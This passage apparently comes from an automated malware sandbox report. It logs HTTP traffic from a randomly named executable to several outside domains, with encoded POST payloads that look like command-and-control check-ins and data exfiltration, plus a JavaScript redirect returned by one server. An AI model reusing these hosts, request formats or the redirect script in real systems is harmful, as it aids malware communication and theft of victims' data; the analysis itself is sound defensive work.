6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      20192.168.2.44989845.141.156.11480792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:55:38.123507977 CET363OUTGET /iuvu/?rfJh=4GSi4NjhieA+eby3OKR9UHmAChFha0TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5yneyjQ3W+H8Nz5kvkADuxuBf3arJIsYCs9inQ=&O258-=pHdHBdXhwLO HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      Host: www.logidant.xyz
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Dec 3, 2024 06:55:39.512082100 CET691INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Tue, 03 Dec 2024 05:55:39 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      21192.168.2.44991623.225.159.4280792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:55:45.372932911 CET626OUTPOST /36be/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 201
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.laohub10.net
                                                      Origin: http://www.laohub10.net
                                                      Referer: http://www.laohub10.net/36be/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 2b 52 57 2f 42 36 57 30 66 4b 6d 61 64 49 78 36 6f 50 76 73 4d 2b 30 43 6c 59 47 50 47 50 54 78 32 4e 6d 46 75 69 6b 75 41 56 71 4b 63 2b 4a 33 31 7a 49 4c 77 35 31 64 6c 64 42 35 73 4d 36 31 47 50 32 4b 38 72 6f 73 38 45 2b 71 2f 69 79 4a 42 66 34 39 33 41 56 45 70 2f 6a 4c 59 53 79 33 36 4f 7a 30 69 61 62 50 4e 5a 46 36 58 2f 77 46 4d 61 53 6f 58 48 33 54 67 32 66 70 6f 78 71 65 71 53 59 47 35 32 4b 39 74 32 2b 78 43 63 48 68 76 67 2b 4c 4e 73 6d 75 46 47 71 43 49 69 6f 54 4f 56 5a 61 71 71 51 52 6e 2b 65 77 36 65 51 30 2b 4f 6a 34 4b 4b 35 48 63 32 68 76 52 79 49 7a 39 51 3d 3d
                                                      Data Ascii: rfJh=+RW/B6W0fKmadIx6oPvsM+0ClYGPGPTx2NmFuikuAVqKc+J31zILw51dldB5sM61GP2K8ros8E+q/iyJBf493AVEp/jLYSy36Oz0iabPNZF6X/wFMaSoXH3Tg2fpoxqeqSYG52K9t2+xCcHhvg+LNsmuFGqCIioTOVZaqqQRn+ew6eQ0+Oj4KK5Hc2hvRyIz9Q==
                                                      Dec 3, 2024 06:55:46.571362972 CET532INHTTP/1.1 200 OK
                                                      Server: Apache
                                                      Content-Type: text/html; charset=utf-8
                                                      Accept-Ranges: bytes
                                                      Cache-Control: max-age=86400
                                                      Age: 1
                                                      Connection: Close
                                                      Content-Length: 357
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                      Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      22192.168.2.44992223.225.159.4280792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:55:48.029781103 CET646OUTPOST /36be/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 221
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.laohub10.net
                                                      Origin: http://www.laohub10.net
                                                      Referer: http://www.laohub10.net/36be/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 2b 52 57 2f 42 36 57 30 66 4b 6d 61 62 6f 68 36 6b 4a 6e 73 5a 4f 30 44 35 6f 47 50 4a 76 53 32 32 4e 36 46 75 6d 56 6c 42 6e 2b 4b 62 66 35 33 32 78 77 4c 39 5a 31 64 71 39 42 38 69 73 37 33 47 50 79 73 38 75 41 73 38 41 65 71 2f 6e 4f 4a 42 4f 34 2b 30 77 56 47 77 76 6a 4a 63 53 79 33 36 4f 7a 30 69 65 4c 70 4e 64 70 36 55 4f 41 46 4e 37 53 6e 5a 6e 33 55 33 47 66 70 6a 52 71 61 71 53 59 77 35 7a 53 62 74 77 36 78 43 65 66 68 76 31 65 4d 61 38 6d 30 4c 6d 72 67 43 48 59 57 4c 32 34 77 74 49 4d 75 70 39 71 53 2f 59 64 75 76 2f 43 76 59 4b 64 30 42 78 6f 62 63 78 31 36 6d 63 47 38 37 6b 30 4c 51 78 69 37 76 32 50 4d 55 69 33 33 43 79 51 3d
                                                      Data Ascii: rfJh=+RW/B6W0fKmaboh6kJnsZO0D5oGPJvS22N6FumVlBn+Kbf532xwL9Z1dq9B8is73GPys8uAs8Aeq/nOJBO4+0wVGwvjJcSy36Oz0ieLpNdp6UOAFN7SnZn3U3GfpjRqaqSYw5zSbtw6xCefhv1eMa8m0LmrgCHYWL24wtIMup9qS/Yduv/CvYKd0Bxobcx16mcG87k0LQxi7v2PMUi33CyQ=
                                                      Dec 3, 2024 06:55:49.212785006 CET532INHTTP/1.1 200 OK
                                                      Server: Apache
                                                      Content-Type: text/html; charset=utf-8
                                                      Accept-Ranges: bytes
                                                      Cache-Control: max-age=86400
                                                      Age: 1
                                                      Connection: Close
                                                      Content-Length: 357
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                      Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      23192.168.2.44993123.225.159.4280792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:55:50.698746920 CET10728OUTPOST /36be/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 10301
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.laohub10.net
                                                      Origin: http://www.laohub10.net
                                                      Referer: http://www.laohub10.net/36be/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 2b 52 57 2f 42 36 57 30 66 4b 6d 61 62 6f 68 36 6b 4a 6e 73 5a 4f 30 44 35 6f 47 50 4a 76 53 32 32 4e 36 46 75 6d 56 6c 42 6e 47 4b 62 6f 52 33 31 57 63 4c 38 5a 31 64 6a 64 42 39 69 73 37 32 47 50 4b 6f 38 75 46 62 38 43 6d 71 2b 46 32 4a 51 4d 41 2b 76 67 56 47 74 2f 6a 55 59 53 79 59 36 4f 6a 34 69 61 58 70 4e 64 70 36 55 4e 6f 46 4e 71 53 6e 4a 58 33 54 67 32 66 74 6f 78 71 79 71 53 41 67 35 79 6e 6d 74 6a 79 78 44 2b 50 68 6a 68 2b 4d 46 4d 6d 71 47 47 72 47 43 48 64 47 4c 32 55 57 74 4a 34 45 70 36 43 53 2b 65 55 33 71 75 37 30 4a 38 52 59 62 67 59 39 53 57 49 38 72 73 36 55 36 68 73 2b 43 43 79 30 30 45 53 61 49 42 7a 73 55 6b 75 57 53 53 57 45 64 43 41 50 2b 36 61 58 34 42 76 58 67 65 5a 56 38 6d 41 58 74 48 44 55 34 77 43 43 65 4e 78 54 53 61 4c 63 56 4b 55 35 38 77 62 4c 67 65 55 46 35 67 30 77 6f 58 65 65 4e 76 72 73 73 69 61 2b 68 70 72 42 77 77 42 74 53 47 36 54 4c 4a 6c 71 78 39 6a 5a 70 64 4e 4b 61 47 79 51 6c 36 54 4e 2f 58 4e 73 54 48 61 2b 6a 4e 43 44 42 52 47 6d 6c [TRUNCATED]
                                                      Data Ascii: rfJh=+RW/B6W0fKmaboh6kJnsZO0D5oGPJvS22N6FumVlBnGKboR31WcL8Z1djdB9is72GPKo8uFb8Cmq+F2JQMA+vgVGt/jUYSyY6Oj4iaXpNdp6UNoFNqSnJX3Tg2ftoxqyqSAg5ynmtjyxD+Phjh+MFMmqGGrGCHdGL2UWtJ4Ep6CS+eU3qu70J8RYbgY9SWI8rs6U6hs+CCy00ESaIBzsUkuWSSWEdCAP+6aX4BvXgeZV8mAXtHDU4wCCeNxTSaLcVKU58wbLgeUF5g0woXeeNvrssia+hprBwwBtSG6TLJlqx9jZpdNKaGyQl6TN/XNsTHa+jNCDBRGmlNFg7cU0zE6HAMurjPJdayxAgy62M88Btbo4gU8lagGGzzv/O/hx964/qWY/gMy1R+XZQhdnf8rAzaKHJsGJfap2mEPUaDZFI6SHY5mmRyL60sSCts9AWyaiN5jRFeKZl58/rdUKCcAO8h7lIC7QVp6i1zwWgjCZY/8qWAzO+fSzOZGXM0UjoW5m5Yqf7+57k8u+PetCvgHv9DMQMoDQPVh78d8YKCPfxkWCsHf3Y7jrys1bgHQuWhWHCw1bWNq47/lVy+tjNpDSEn3TaZx+TaPdN4YpmRKuWBcTlgpkfpJlYyOvv3vHfDKeFeZsBRWNDbrJCVVD6lmvl4gfJ15bVj3Ro86myi25z//46xEi5cKj38X9yac0PmaBiZcByNCy8OPhdR+GDEIlUFyHFyPweUi1RBaUjACjNBccHqmVgHSwg1CvvkCPW7EkAf8wBkzrxwVQaGEusnj3m8XkbPrX1Co8xmrV6p1z9gy7Pt2laZx6Jqf6qFKa9C7POxF6CD9vLN4G7Wpy4a3deI+fCDTElu5H+6bfQgZ/aVoT43l6RlYuf2cb4xBDa6oRGVDDvlBSrTkhzGuHt8d4KGX4vudBiL/uWrmAj+b5C71vaDGeUxEHAbImwiGGgjOc1U09xT0ck+9Tc0g3YWpFsEkenYK67hILtEP4osZKyyA [TRUNCATED]
                                                      Dec 3, 2024 06:55:51.881123066 CET532INHTTP/1.1 200 OK
                                                      Server: Apache
                                                      Content-Type: text/html; charset=utf-8
                                                      Accept-Ranges: bytes
                                                      Cache-Control: max-age=86400
                                                      Age: 1
                                                      Connection: Close
                                                      Content-Length: 357
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                      Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      24192.168.2.44993723.225.159.4280792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:55:53.350812912 CET363OUTGET /36be/?O258-=pHdHBdXhwLO&rfJh=zT+fCPSXWqCfWPgPkoP8augIhoSODsGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7rERMucz0ZFCszNnC27qzdt1he7kDJbjieX8= HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      Host: www.laohub10.net
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Dec 3, 2024 06:55:54.586163044 CET532INHTTP/1.1 200 OK
                                                      Server: Apache
                                                      Content-Type: text/html; charset=utf-8
                                                      Accept-Ranges: bytes
                                                      Cache-Control: max-age=86400
                                                      Age: 1
                                                      Connection: Close
                                                      Content-Length: 357
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                      Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      25192.168.2.449953172.67.187.11480792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:56:00.190475941 CET629OUTPOST /kf1m/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 201
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.zkdamdjj.shop
                                                      Origin: http://www.zkdamdjj.shop
                                                      Referer: http://www.zkdamdjj.shop/kf1m/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 74 42 58 6c 4d 53 6b 49 78 4a 38 58 44 4a 31 63 58 48 65 4e 38 6e 34 79 33 37 51 49 45 50 47 61 42 49 46 48 4c 5a 73 31 35 67 62 67 73 4c 34 74 56 47 5a 4d 30 4c 7a 58 31 48 71 66 70 38 6e 31 66 52 64 52 59 42 4f 7a 39 41 33 4e 44 2f 70 5a 32 6b 30 4a 66 49 53 58 66 63 42 49 71 67 34 5a 74 2b 32 6c 4f 6a 54 6c 4a 4a 4c 77 49 4e 38 63 77 31 33 52 75 73 39 36 51 76 70 2f 7a 35 48 67 42 4b 6a 2b 67 63 36 6a 6f 4f 6e 67 4a 79 63 63 66 61 42 75 43 49 34 53 63 57 43 51 30 36 75 53 36 51 33 37 38 53 61 65 55 39 6f 4d 6b 64 31 69 33 4f 70 71 6f 74 6c 64 36 39 36 4c 62 7a 6e 46 52 51 3d 3d
                                                      Data Ascii: rfJh=tBXlMSkIxJ8XDJ1cXHeN8n4y37QIEPGaBIFHLZs15gbgsL4tVGZM0LzX1Hqfp8n1fRdRYBOz9A3ND/pZ2k0JfISXfcBIqg4Zt+2lOjTlJJLwIN8cw13Rus96Qvp/z5HgBKj+gc6joOngJyccfaBuCI4ScWCQ06uS6Q378SaeU9oMkd1i3Opqotld696LbznFRQ==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      26192.168.2.449959172.67.187.11480792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:56:02.857264042 CET649OUTPOST /kf1m/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 221
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.zkdamdjj.shop
                                                      Origin: http://www.zkdamdjj.shop
                                                      Referer: http://www.zkdamdjj.shop/kf1m/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 74 42 58 6c 4d 53 6b 49 78 4a 38 58 44 6f 46 63 4d 6e 69 4e 72 58 34 74 70 72 51 49 4f 76 47 65 42 49 5a 48 4c 59 6f 63 2b 54 2f 67 74 75 63 74 57 45 78 4d 33 4c 7a 58 2b 6e 72 30 30 73 6e 69 66 52 5a 6a 59 44 71 7a 39 45 6e 4e 44 2b 5a 5a 78 58 4d 49 65 59 53 56 58 38 42 4f 6b 41 34 5a 74 2b 32 6c 4f 6a 75 4f 4a 4a 54 77 49 5a 41 63 68 6b 33 57 74 73 39 6c 56 76 70 2f 33 35 48 6b 42 4b 69 72 67 64 57 64 6f 4d 76 67 4a 32 4d 63 65 4f 31 74 52 6f 34 51 44 47 44 62 35 4a 72 34 69 53 6d 58 6a 7a 58 39 52 2f 77 31 68 62 34 34 6d 2f 49 39 36 74 42 75 6e 36 7a 2f 57 77 61 4d 4b 58 41 44 42 49 43 44 51 30 6f 39 34 34 48 54 38 66 41 48 58 46 34 3d
                                                      Data Ascii: rfJh=tBXlMSkIxJ8XDoFcMniNrX4tprQIOvGeBIZHLYoc+T/gtuctWExM3LzX+nr00snifRZjYDqz9EnND+ZZxXMIeYSVX8BOkA4Zt+2lOjuOJJTwIZAchk3Wts9lVvp/35HkBKirgdWdoMvgJ2MceO1tRo4QDGDb5Jr4iSmXjzX9R/w1hb44m/I96tBun6z/WwaMKXADBICDQ0o944HT8fAHXF4=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      27192.168.2.449966172.67.187.11480792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:56:05.511126041 CET10731OUTPOST /kf1m/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 10301
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.zkdamdjj.shop
                                                      Origin: http://www.zkdamdjj.shop
                                                      Referer: http://www.zkdamdjj.shop/kf1m/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 74 42 58 6c 4d 53 6b 49 78 4a 38 58 44 6f 46 63 4d 6e 69 4e 72 58 34 74 70 72 51 49 4f 76 47 65 42 49 5a 48 4c 59 6f 63 2b 54 33 67 74 59 51 74 55 6c 78 4d 32 4c 7a 58 33 48 71 54 30 73 6d 67 66 52 67 71 59 44 57 4a 39 43 37 4e 43 63 52 5a 77 6d 4d 49 55 59 53 56 49 73 42 4c 71 67 35 45 74 2b 6e 73 4f 69 43 4f 4a 4a 54 77 49 66 6b 63 68 31 33 57 72 73 39 36 51 76 70 4a 7a 35 48 41 42 4b 37 63 67 64 6a 6d 30 76 58 67 4b 57 63 63 63 39 64 74 4c 6f 34 57 43 47 43 62 35 4f 6a 6a 69 53 71 74 6a 79 53 53 52 39 73 31 73 66 31 66 39 64 67 6d 70 62 74 66 31 4c 48 55 56 77 53 78 47 6b 38 6c 48 4b 50 62 45 51 67 47 35 50 57 55 6c 4d 41 55 4d 52 63 45 71 42 74 76 56 53 46 48 7a 69 6f 64 53 52 69 56 4a 71 6c 31 34 4f 50 4b 6c 76 78 66 64 63 70 4b 6d 78 63 4e 37 31 75 59 7a 46 64 49 4a 30 66 72 77 31 58 2f 4a 66 32 44 35 38 59 6e 4a 70 33 6f 34 39 61 41 79 6d 77 39 47 55 4e 2b 57 46 48 6a 7a 34 57 4c 45 59 54 45 4b 6c 71 53 30 7a 56 48 70 59 70 31 37 6a 69 64 53 68 78 69 35 43 67 73 42 4c 74 41 68 [TRUNCATED]
